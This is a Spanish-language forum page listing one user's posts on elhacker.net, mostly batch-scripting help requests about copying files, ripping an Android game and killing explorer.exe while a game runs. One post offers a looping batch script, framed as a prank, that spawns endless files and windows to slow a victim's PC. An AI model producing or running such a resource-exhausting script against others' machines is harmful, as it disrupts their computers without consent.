elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 2 [3] 4
21  Foros Generales / Sugerencias y dudas sobre el Foro / [Sugerencias] Mejoras y nuevas secciones en el foro. en: 14 Marzo 2014, 01:10 am
Hola, me presento en esta sección del foro para pedirles que agreguen un foro exclusivo para Android porque ya es un SO que ya esta disponible ademas de versión para dispositivos ARM, para PC de 32 bits (x86), vamos, almeno podrían mudarlo a la sección de SO  también recomendaría que se actualice el script SMF a su versión mas actual 2.0.7 y que por favor se agregue para dar ya que hay gente muy inteligente que se lo merece, ademas de los moderadores que siempre andan resolviendo todo Eleкtro por ejemplo.
22  Programación / Scripting / [Solucionado]No puedo iniciar un bat desde otro batch windows 7 que ascooo en: 12 Marzo 2014, 00:03 am
la :-X :-X :-X :-X :-X :-X :-X No puedo iniciar un batch desde otro batch porque no se ejecuta el comando ayudenme xfavor en que me confundo
Código:
@echo off
del /Q "Bank_022\*.bat"
pause
xcopy /y "*.bat" "Bank_022\*.bat"
pause
start "D:\GTAndroidRipeado\com.rockstargames.gtasa\main.2.com.rockstargames.gtasa\audio\n\Bank_022\sss.bat"
pause
del /Q "Bank_022\*.bat"
pause



estoy haciendo un script para copiar y ejecutar batch en aprox. 200 carpetas, pero cuando lo inicio se aparece la pantalla de cmd y nada mas, y probe hasta con call y sin ninguno pero no puedo, en que me estoy equivocando diganme, es lo unico que no funciona.
23  Seguridad Informática / Hacking / [Aporte] Script sencillo que invade el pc y lo realentece en: 11 Marzo 2014, 20:15 pm
Código:
@echo off
:1
set rando=archivo%random%.t01
dir *.t01 /b >%rando%
start %rando%
goto:1

Es una estructura sencilla que relentece el ordenador, una buena troleada. Disculpen si me equivoque de lugar.
24  Programación / Scripting / [AYUDA][BATCH] Sistema para remplazar varios archivos por uno conservando nombre en: 11 Marzo 2014, 18:44 pm
Les pido ayuda, hace varios años que no hago un script batch y me acuerdo muy poco como se hace uno, esta ves se me presenta un problema, tengo que ripear un juego de android que tiene muchos archivos mp3 pesados, entonces hice un mp3 vació sin sonido ni audio y para que no falle el sistema tenia pensado hacer un script que remplace los audios por el audio vació y liviano que hice.
25  Sistemas Operativos / Windows / Necesito que alguien me pase una bakup del registro del windows 7 en: 10 Abril 2012, 18:42 pm
Necesitaría una bakup de alguien que tenga Windows 7 para reparar un problema con batch que borre la entrada batfile o todo lo que puede y ahora siquiera se abre.
http://windows.microsoft.com/es-es/windows7/Back-up-the-registry
26  Comunicaciones / Redes / Personas que no conozco en sitios red sin WI-FI en: 31 Enero 2012, 16:38 pm
El otro día estaba subiendo unas cosas en el DVD y resulta que toco en redes y me apareció una cascada de PC's, INMEDIATAMENTE me informe sobre el tema, obviamente esto le pasa a gente que le "roban" WI-FI (Nada de otro mundo...), lo mas lindo es que no tengo WI-FI, solo active lo de grupos, la verdad es que quiero "escarbar" mas sobre el tema, ¿me dicen que puede ser?

PD: Uso Hamachi y VirtualBOX.
27  Programación / Programación C/C++ / [Ayuda] Algo para poder escribir los archivos de una carpeta en un bloc de nota en: 17 Diciembre 2011, 17:46 pm
Necesito algo para poder escribir los archivos de una carpeta en un bloc de notas tipo el comando DIR /B en batch pero para C++
28  Programación / Scripting / [Solucionado] [Batch] Necesitaría saber el error del código. en: 22 Julio 2011, 22:06 pm
Bueno, a duras penas y con ayuda de @Francisasdasd pude hacer este código que rastrea si esta abierto el GTA San Andreas u otro juego y cierra el explorer y si no esta abierto el GTA, abre el explorer comprobando que no este abierto para no tener problemas y  luego se reinicia el código con un goto; necesitaría su ayuda para poder repararlo porque no me funciona, este es el pequeño código:

Código:
:1
tasklist | find /I "gta_sa.exe"
if %errorlevel%==0 (
TASKKILL /F /IM explorer.exe
goto 1
) else (
for /F %%a in ('tasklist') do (
IF %%a==explorer.exe (goto 1)
)
goto 1

Saludos y gracias por leer.
29  Programación / Scripting / [Batch] hacer que si hay un proceso en ejecución se cierre el explorer en: 18 Julio 2011, 21:15 pm
Necesito hacer algo que si existiese un proceso en ejecución ejemplo gta_sa.exe se cierre el explorer.exe aci consigo mejor rendimiento entonces cuando se cierre el proceso gta_sa.exe se abra el explorer, el problema es que yo no se la carpeta de gta_sa.exe
30  Seguridad Informática / Desafíos - Wargames / Prueba a todos los que se crean "hackers" en: 8 Julio 2011, 00:57 am
Bueno, prueba a todos los que se crean "hackers" no es un duelo ni nada de eso, solo es para probar su inteligencia miren esta imagen, ¿que le ven? si no pueden averiguar nada les doy una pista:

Link: faaaf6daaf2525da.eshost.es/elsecreto.bmp

PISTA: EL SECRETO ESTA DENTRO DE LA IMAGEN

Gandores:
HUBIESE SALIDO PRIMERO BlackZeroX▓▓▒▒░░ PERO EL PRIMER HOST ME MODIFICO EL CODIGO DE LA IMAGEN
1ST:pitoloko
2ST:.:UND3R:.

SABEEEN
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines